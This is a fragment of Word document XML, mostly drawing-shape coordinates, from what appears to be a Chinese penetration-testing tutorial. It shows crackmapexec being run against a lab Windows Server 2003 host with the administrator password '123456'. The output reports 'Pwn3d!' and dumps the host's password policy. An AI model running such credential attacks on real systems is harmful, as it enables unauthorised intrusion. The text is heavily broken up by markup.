        <v:shape style="position:absolute;left:5790;top:3810;width:130;height:250" coordorigin="5790,3810" coordsize="130,250" path="m5817,3821l5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5817,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5818,3821,5819,3821,5819,3821,5819,3821,5819,3821,5819,3821,5820,3821,5820,3821,5820,3821,5821,3821,5821,3821,5821,3821,5821,3821,5822,3821,5822,3821,5823,3821,5823,3821,5823,3821,5824,3821,5824,3821,5825,3821,5825,3821,5826,3821,5826,3821,5827,3821,5828,3821,5828,3821,5829,3821,5829,3821,5830,3821,5831,3821,5832,3821,5832,3821,5833,3821,5834,3821,5835,3821,5836,3821,5836,3821,5837,3821,5838,3821,5839,3821,5840,3821,5841,3821,5842,3821,5844,3821,5845,3821,5846,3821,5847,3821,5848,3821,5849,3821,5851,3821,5852,3821,5853,3821,5855,3821,5856,3821,5858,3821,5859,3821,5861,3821,5862,3821,5864,3821,5865,3821,5867,3821,5869,3821,5871,3821,5872,3821,5874,3821,5876,3821,5878,3821,5880,3821,5882,3821,5884,3821,5886,3821,5888,3821,5890,3821,5893,3821,5895,3821,5897,3821,5899,3821,5902,3821,5904,3821,5907,3821,5909,3821,5912,3821,5914,3821,5917,3821,5920,3821,5922,3821,5925,3821,5928,3821,5931,3821,5934,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3821,5937,3822,5937,3822,5937,3822,5937,3822,5937,3822,5937,3822,5937,3823,5937,3823,5937,3823,5937,3823,5937,3824,5937,3824,5937,3824,5937,3825,5937,3825,5937,3825,5937,3826,5937,3826,5937,3827,5937,3827,5937,3828,5937,3829,5937,3829,5937,3830,5937,3831,5937,3831,5937,3832,5937,3833,5937,3834,5937,3835,5937,3836,5937,3837,5937,3838,5937,3839,5937,3840,5937,3841,5937,3842,5937,3843,5937,3845,5937,3846,5937,3848,5937,3849,5937,3850,5937,3852,5937,3854,5937,3855,5937,3857,5937,3859,5937,3861,5937,3863,5937,3864,5937,3866,5937,3869,5937,3871,5937,3873,5937,3875,5937,3877,5937,3880,5937,3882,5937,3885,5937,3887,5937,3890,5937,3893,5937,3896,5937,3898,5937,3901,5937,3904,5937,3907,5937,3911,5937,3914,5937,3917,5937,3921,5937,3924,5937,3928,5937,3931,5937,3935,5937,3939,5937,3943,5937,3947,5937,3951,5937,3955,5937,3959,5937,3963,5937,3968,5937,3972,5937,3977,5937,3982,5937,3986,5937,3991,5937,3996,5937,4001,5937,4006,5937,4012,5937,4017,5937,4022,5937,4028,5937,4034,5937,4039,5937,4045,5937,4051,5937,4057,5937,4063,5937,4070,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5937,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5936,4076,5935,4076,5935,4076,5935,4076,5935,4076,5935,4076,5934,4076,5934,4076,5934,4076,5934,4076,5933,4076,5933,4076,5933,4076,5932,4076,5932,4076,5932,4076,5931,4076,5931,4076,5930,4076,5930,4076,5930,4076,5929,4076,5929,4076,5928,4076,5928,4076,5927,4076,5926,4076,5926,4076,5925,4076,5924,4076,5924,4076,5923,4076,5922,4076,5922,4076,5921,4076,5920,4076,5919,4076,5918,4076,5917,4076,5917,4076,5916,4076,5915,4076,5914,4076,5913,4076,5911,4076,5910,4076,5909,4076,5908,4076,5907,4076,5906,4076,5904,4076,5903,4076,5902,4076,5901,4076,5899,4076,5898,4076,5896,4076,5895,4076,5893,4076,5892,4076,5890,4076,5888,4076,5887,4076,5885,4076,5883,4076,5882,4076,5880,4076,5878,4076,5876,4076,5874,4076,5872,4076,5870,4076,5868,4076,5866,4076,5864,4076,5861,4076,5859,4076,5857,4076,5855,4076,5852,4076,5850,4076,5847,4076,5845,4076,5842,4076,5840,4076,5837,4076,5834,4076,5831,4076,5829,4076,5826,4076,5823,4076,5820,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4076,5817,4075,5817,4075,5817,4075,5817,4075,5817,4075,5817,4075,5817,4074,5817,4074,5817,4074,5817,4074,5817,4073,5817,4073,5817,4073,5817,4072,5817,4072,5817,4072,5817,4071,5817,4071,5817,4070,5817,4070,5817,4069,5817,4068,5817,4068,5817,4067,5817,4066,5817,4066,5817,4065,5817,4064,5817,4063,5817,4062,5817,4061,5817,4060,5817,4059,5817,4058,5817,4057,5817,4056,5817,4055,5817,4054,5817,4052,5817,4051,5817,4049,5817,4048,5817,4047,5817,4045,5817,4043,5817,4042,5817,4040,5817,4038,5817,4036,5817,4034,5817,4033,5817,4031,5817,4028,5817,4026,5817,4024,5817,4022,5817,4020,5817,4017,5817,4015,5817,4012,5817,4010,5817,4007,5817,4004,5817,4001,5817,3999,5817,3996,5817,3993,5817,3989,5817,3986,5817,3983,5817,3980,5817,3976,5817,3973,5817,3969,5817,3966,5817,3962,5817,3958,5817,3954,5817,3950,5817,3946,5817,3942,5817,3938,5817,3934,5817,3929,5817,3925,5817,3920,5817,3915,5817,3911,5817,3906,5817,3901,5817,3896,5817,3891,5817,3885,5817,3880,5817,3875,5817,3869,5817,3863,5817,3858,5817,3852,5817,3846,5817,3840,5817,3834,5817,3827,5817,3821e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:414.500pt;margin-top:542.500pt;width:18.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="8290,10850" coordsize="370,270">
        <v:shape style="position:absolute;left:8290;top:10850;width:370;height:270" coordorigin="8290,10850" coordsize="370,270" path="m8308,10874l8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8308,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8309,10874,8310,10874,8310,10874,8310,10874,8310,10874,8311,10874,8311,10874,8312,10874,8312,10874,8312,10874,8313,10874,8313,10874,8314,10874,8315,10874,8315,10874,8316,10874,8317,10874,8317,10874,8318,10874,8319,10874,8320,10874,8321,10874,8322,10874,8323,10874,8324,10874,8325,10874,8326,10874,8328,10874,8329,10874,8330,10874,8332,10874,8333,10874,8335,10874,8337,10874,8338,10874,8340,10874,8342,10874,8344,10874,8346,10874,8348,10874,8350,10874,8352,10874,8354,10874,8357,10874,8359,10874,8362,10874,8364,10874,8367,10874,8370,10874,8372,10874,8375,10874,8378,10874,8381,10874,8385,10874,8388,10874,8391,10874,8395,10874,8398,10874,8402,10874,8406,10874,8410,10874,8414,10874,8418,10874,8422,10874,8426,10874,8430,10874,8435,10874,8439,10874,8444,10874,8449,10874,8454,10874,8459,10874,8464,10874,8469,10874,8475,10874,8480,10874,8486,10874,8491,10874,8497,10874,8503,10874,8509,10874,8516,10874,8522,10874,8528,10874,8535,10874,8542,10874,8549,10874,8556,10874,8563,10874,8570,10874,8577,10874,8585,10874,8593,10874,8600,10874,8608,10874,8617,10874,8625,10874,8633,10874,8642,10874,8651,10874,8659,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10874,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10875,8668,10876,8668,10876,8668,10876,8668,10876,8668,10876,8668,10877,8668,10877,8668,10877,8668,10877,8668,10878,8668,10878,8668,10879,8668,10879,8668,10879,8668,10880,8668,10880,8668,10881,8668,10882,8668,10882,8668,10883,8668,10883,8668,10884,8668,10885,8668,10886,8668,10887,8668,10887,8668,10888,8668,10889,8668,10890,8668,10891,8668,10892,8668,10893,8668,10895,8668,10896,8668,10897,8668,10898,8668,10900,8668,10901,8668,10903,8668,10904,8668,10906,8668,10907,8668,10909,8668,10911,8668,10912,8668,10914,8668,10916,8668,10918,8668,10920,8668,10922,8668,10924,8668,10926,8668,10929,8668,10931,8668,10933,8668,10936,8668,10938,8668,10941,8668,10944,8668,10946,8668,10949,8668,10952,8668,10955,8668,10958,8668,10961,8668,10964,8668,10967,8668,10971,8668,10974,8668,10978,8668,10981,8668,10985,8668,10989,8668,10992,8668,10996,8668,11000,8668,11004,8668,11008,8668,11013,8668,11017,8668,11021,8668,11026,8668,11030,8668,11035,8668,11040,8668,11045,8668,11050,8668,11055,8668,11060,8668,11065,8668,11071,8668,11076,8668,11082,8668,11087,8668,11093,8668,11099,8668,11105,8668,11111,8668,11117,8668,11123,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8668,11130,8667,11130,8667,11130,8667,11130,8667,11130,8667,11130,8666,11130,8666,11130,8666,11130,8665,11130,8665,11130,8665,11130,8664,11130,8664,11130,8663,11130,8663,11130,8662,11130,8661,11130,8661,11130,8660,11130,8659,11130,8658,11130,8658,11130,8657,11130,8656,11130,8655,11130,8654,11130,8653,11130,8651,11130,8650,11130,8649,11130,8648,11130,8646,11130,8645,11130,8643,11130,8642,11130,8640,11130,8638,11130,8637,11130,8635,11130,8633,11130,8631,11130,8629,11130,8627,11130,8624,11130,8622,11130,8620,11130,8617,11130,8615,11130,8612,11130,8610,11130,8607,11130,8604,11130,8601,11130,8598,11130,8595,11130,8592,11130,8589,11130,8585,11130,8582,11130,8578,11130,8575,11130,8571,11130,8567,11130,8563,11130,8559,11130,8555,11130,8551,11130,8546,11130,8542,11130,8537,11130,8532,11130,8528,11130,8523,11130,8518,11130,8513,11130,8507,11130,8502,11130,8496,11130,8491,11130,8485,11130,8479,11130,8473,11130,8467,11130,8461,11130,8455,11130,8448,11130,8442,11130,8435,11130,8428,11130,8421,11130,8414,11130,8407,11130,8399,11130,8392,11130,8384,11130,8376,11130,8368,11130,8360,11130,8352,11130,8343,11130,8335,11130,8326,11130,8317,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11130,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11129,8308,11128,8308,11128,8308,11128,8308,11128,8308,11128,8308,11127,8308,11127,8308,11127,8308,11126,8308,11126,8308,11126,8308,11125,8308,11125,8308,11124,8308,11124,8308,11123,8308,11123,8308,11122,8308,11121,8308,11121,8308,11120,8308,11119,8308,11118,8308,11118,8308,11117,8308,11116,8308,11115,8308,11114,8308,11113,8308,11112,8308,11111,8308,11110,8308,11108,8308,11107,8308,11106,8308,11104,8308,11103,8308,11102,8308,11100,8308,11099,8308,11097,8308,11095,8308,11094,8308,11092,8308,11090,8308,11088,8308,11086,8308,11084,8308,11082,8308,11080,8308,11078,8308,11075,8308,11073,8308,11071,8308,11068,8308,11066,8308,11063,8308,11060,8308,11058,8308,11055,8308,11052,8308,11049,8308,11046,8308,11043,8308,11040,8308,11037,8308,11033,8308,11030,8308,11026,8308,11023,8308,11019,8308,11016,8308,11012,8308,11008,8308,11004,8308,11000,8308,10996,8308,10991,8308,10987,8308,10983,8308,10978,8308,10974,8308,10969,8308,10964,8308,10959,8308,10954,8308,10949,8308,10944,8308,10939,8308,10934,8308,10928,8308,10923,8308,10917,8308,10911,8308,10905,8308,10899,8308,10893,8308,10887,8308,10881,8308,10874e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:597.600pt;width:467.400pt;height:137.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId16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密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>码策略</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="378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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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~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cme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192.168.1.119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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐u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administrator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9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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'123456'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‐‐pass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‐p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ol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.119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WIN03X64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Windows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Server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2003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R2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3790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Service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Pack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x32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name:WIN03X64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domain:WIN03X64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signing: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False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SMBv1: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True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)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.119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WIN03X64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+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WIN03X64\administrator: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123456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Pwn3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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="996c38"/>
          <w:spacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)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4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.119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WIN03X64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+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Dumping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password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info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for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domain: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10"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>W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IN03X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64</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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.119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WIN03X64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Minimum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password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length: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None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.119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WIN03X64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Password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history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length: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None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7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.119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WIN03X64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Maximum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password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age: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42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days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22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hours</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="24" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="980053"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>47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minutes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.119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WIN03X64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.119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WIN03X64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Password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Complexity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Flags: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000000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10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.119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WIN03X64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Domain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Refuse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Password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Change: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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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.119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WIN03X64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Domain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Password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Store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Cleartext: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13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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12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.119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WIN03X64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Domain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Password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Lockout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Admins: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12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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13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.119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WIN03X64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Domain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Password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No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Clear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Change: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0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14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.119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WIN03X64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Domain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Password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No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Anon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Change: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0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15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9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.119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WIN03X64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Domain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Password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Complex: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11"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0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16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体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9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.119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WIN03X64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17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9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.119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WIN03X64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Minimum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password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age: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None</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="136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18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.119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WIN03X64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Reset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Account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Lockout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Counter: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30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minut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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="14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19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.119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WIN03X64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Locked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Account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Duration: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30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minutes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20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.119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WIN03X64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Account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Lockout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Threshold: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None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2659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.119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WIN03X64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Forced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Log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off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Time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Not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Set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22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50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3"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-45"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-14"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hash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19.500pt;margin-top:70.500pt;width:0.500pt;height:312.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,1410" coordsize="10,6250">
        <v:shape style="position:absolute;left:10390;top:1410;width:10;height:6250" coordorigin="10390,1410" coordsize="10,6250" path="m10402,1420l10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1420,10402,1421,10402,1421,10402,1422,10402,1422,10402,1423,10402,1425,10402,1426,10402,1428,10402,1430,10402,1432,10402,1435,10402,1438,10402,1441,10402,1445,10402,1449,10402,1454,10402,1459,10402,1465,10402,1471,10402,1478,10402,1485,10402,1493,10402,1501,10402,1510,10402,1520,10402,1530,10402,1541,10402,1553,10402,1565,10402,1579,10402,1593,10402,1607,10402,1623,10402,1639,10402,1657,10402,1675,10402,1694,10402,1714,10402,1735,10402,1757,10402,1780,10402,1804,10402,1829,10402,1856,10402,1883,10402,1911,10402,1941,10402,1971,10402,2003,10402,2036,10402,2070,10402,2106,10402,2143,10402,2181,10402,2220,10402,2261,10402,2303,10402,2346,10402,2391,10402,2437,10402,2485,10402,2534,10402,2585,10402,2637,10402,2690,10402,2746,10402,2803,10402,2861,10402,2921,10402,2983,10402,3046,10402,3111,10402,3178,10402,3246,10402,3317,10402,3389,10402,3462,10402,3538,10402,3616,10402,3695,10402,3776,10402,3859,10402,3944,10402,4031,10402,4120,10402,4212,10402,4305,10402,4400,10402,4497,10402,4596,10402,4697,10402,4801,10402,4907,10402,5014,10402,5124,10402,5237,10402,5351,10402,5468,10402,5587,10402,5708,10402,5832,10402,5958,10402,6087,10402,6218,10402,6351,10402,6486,10402,6625,10402,6765,10402,6909,10402,7054,10402,7202,10402,7353,10402,7507,10402,7663e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:390" coordorigin="1490,1410" coordsize="8990,390" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1423,10484,1424,10484,1424,10484,1425,10484,1425,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1431,10484,1431,10484,1432,10484,1433,10484,1435,10484,1436,10484,1437,10484,1438,10484,1439,10484,1441,10484,1442,10484,1444,10484,1445,10484,1447,10484,1449,10484,1450,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1463,10484,1465,10484,1467,10484,1470,10484,1472,10484,1475,10484,1478,10484,1480,10484,1483,10484,1486,10484,1489,10484,1493,10484,1496,10484,1499,10484,1503,10484,1506,10484,1510,10484,1514,10484,1517,10484,1521,10484,1525,10484,1530,10484,1534,10484,1538,10484,1543,10484,1547,10484,1552,10484,1557,10484,1562,10484,1567,10484,1572,10484,1578,10484,1583,10484,1589,10484,1594,10484,1600,10484,1606,10484,1612,10484,1618,10484,1625,10484,1631,10484,1638,10484,1644,10484,1651,10484,1658,10484,1665,10484,1673,10484,1680,10484,1688,10484,1695,10484,1703,10484,1711,10484,1720,10484,1728,10484,1736,10484,1745,10484,1754,10484,1763,10484,1772,10484,1781,10484,1791,10484,1800,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10483,1810,10482,1810,10482,1810,10480,1810,10479,1810,10477,1810,10475,1810,10473,1810,10470,1810,10466,1810,10462,1810,10458,1810,10453,1810,10448,1810,10442,1810,10435,1810,10428,1810,10419,1810,10411,1810,10401,1810,10391,1810,10379,1810,10367,1810,10354,1810,10340,1810,10326,1810,10310,1810,10293,1810,10275,1810,10256,1810,10236,1810,10215,1810,10192,1810,10168,1810,10143,1810,10117,1810,10090,1810,10061,1810,10031,1810,9999,1810,9966,1810,9931,1810,9895,1810,9858,1810,9819,1810,9778,1810,9735,1810,9691,1810,9646,1810,9598,1810,9549,1810,9498,1810,9445,1810,9391,1810,9334,1810,9275,1810,9215,1810,9153,1810,9088,1810,9022,1810,8953,1810,8883,1810,8810,1810,8735,1810,8658,1810,8578,1810,8497,1810,8413,1810,8326,1810,8238,1810,8146,1810,8053,1810,7957,1810,7859,1810,7758,1810,7654,1810,7548,1810,7439,1810,7328,1810,7214,1810,7097,1810,6977,1810,6855,1810,6730,1810,6602,1810,6471,1810,6337,1810,6201,1810,6061,1810,5918,1810,5773,1810,5624,1810,5472,1810,5317,1810,5159,1810,4997,1810,4833,1810,4665,1810,4494,1810,4319,1810,4141,1810,3960,1810,3776,1810,3587,1810,3396,1810,3201,1810,3002,1810,2800,1810,2594,1810,2385,1810,2172,1810,1955,1810,1734,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1809,1510,1808,1510,1808,1510,1808,1510,1807,1510,1807,1510,1807,1510,1806,1510,1806,1510,1805,1510,1805,1510,1804,1510,1804,1510,1803,1510,1802,1510,1802,1510,1801,1510,1800,1510,1799,1510,1798,1510,1797,1510,1796,1510,1795,1510,1794,1510,1793,1510,1791,1510,1790,1510,1789,1510,1787,1510,1786,1510,1784,1510,1783,1510,1781,1510,1779,1510,1777,1510,1775,1510,1773,1510,1771,1510,1769,1510,1767,1510,1765,1510,1762,1510,1760,1510,1757,1510,1755,1510,1752,1510,1749,1510,1746,1510,1743,1510,1740,1510,1737,1510,1734,1510,1730,1510,1727,1510,1723,1510,1720,1510,1716,1510,1712,1510,1708,1510,1704,1510,1700,1510,1696,1510,1691,1510,1687,1510,1682,1510,1678,1510,1673,1510,1668,1510,1663,1510,1657,1510,1652,1510,1647,1510,1641,1510,1635,1510,1630,1510,1624,1510,1618,1510,1611,1510,1605,1510,1599,1510,1592,1510,1585,1510,1578,1510,1571,1510,1564,1510,1557,1510,1549,1510,1542,1510,1534,1510,1526,1510,1518,1510,1510,1510,1502,1510,1493,1510,1485,1510,1476,1510,1467,1510,1458,1510,1448,1510,1439,1510,1429,1510,1420e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:69.599pt;width:445.800pt;height:20.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId17" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:89.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1790" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1790;width:8990;height:650" coordorigin="1490,1790" coordsize="8990,650" path="m1510,1810l1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1510,1810,1511,1810,1512,1810,1512,1810,1514,1810,1515,1810,1517,1810,1519,1810,1521,1810,1524,1810,1528,1810,1532,1810,1536,1810,1541,1810,1546,1810,1552,1810,1559,1810,1566,1810,1575,1810,1583,1810,1593,1810,1603,1810,1615,1810,1627,1810,1640,1810,1654,1810,1668,1810,1684,1810,1701,1810,1719,1810,1738,1810,1758,1810,1780,1810,1802,1810,1826,1810,1851,1810,1877,1810,1904,1810,1933,1810,1963,1810,1995,1810,2028,1810,2063,1810,2099,1810,2136,1810,2175,1810,2216,1810,2259,1810,2303,1810,2348,1810,2396,1810,2445,1810,2496,1810,2549,1810,2604,1810,2660,1810,2719,1810,2779,1810,2841,1810,2906,1810,2972,1810,3041,1810,3112,1810,3184,1810,3259,1810,3336,1810,3416,1810,3498,1810,3582,1810,3668,1810,3757,1810,3848,1810,3941,1810,4037,1810,4136,1810,4236,1810,4340,1810,4446,1810,4555,1810,4666,1810,4780,1810,4897,1810,5017,1810,5139,1810,5264,1810,5392,1810,5523,1810,5657,1810,5793,1810,5933,1810,6076,1810,6222,1810,6370,1810,6522,1810,6677,1810,6835,1810,6997,1810,7161,1810,7329,1810,7500,1810,7675,1810,7853,1810,8034,1810,8219,1810,8407,1810,8598,1810,8793,1810,8992,1810,9194,1810,9400,1810,9609,1810,9823,1810,10039,1810,10260,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1810,10484,1811,10484,1811,10484,1811,10484,1811,10484,1811,10484,1812,10484,1812,10484,1812,10484,1813,10484,1813,10484,1814,10484,1814,10484,1815,10484,1816,10484,1816,10484,1817,10484,1818,10484,1819,10484,1820,10484,1821,10484,1822,10484,1823,10484,1825,10484,1826,10484,1827,10484,1829,10484,1830,10484,1832,10484,1834,10484,1836,10484,1838,10484,1840,10484,1842,10484,1844,10484,1846,10484,1849,10484,1851,10484,1854,10484,1857,10484,1860,10484,1863,10484,1866,10484,1869,10484,1872,10484,1876,10484,1879,10484,1883,10484,1887,10484,1891,10484,1895,10484,1899,10484,1903,10484,1908,10484,1913,10484,1917,10484,1922,10484,1928,10484,1933,10484,1938,10484,1944,10484,1950,10484,1955,10484,1961,10484,1968,10484,1974,10484,1981,10484,1987,10484,1994,10484,2001,10484,2009,10484,2016,10484,2024,10484,2032,10484,2040,10484,2048,10484,2056,10484,2065,10484,2074,10484,2083,10484,2092,10484,2101,10484,2111,10484,2121,10484,2131,10484,2141,10484,2151,10484,2162,10484,2173,10484,2184,10484,2195,10484,2207,10484,2219,10484,2231,10484,2243,10484,2255,10484,2268,10484,2281,10484,2294,10484,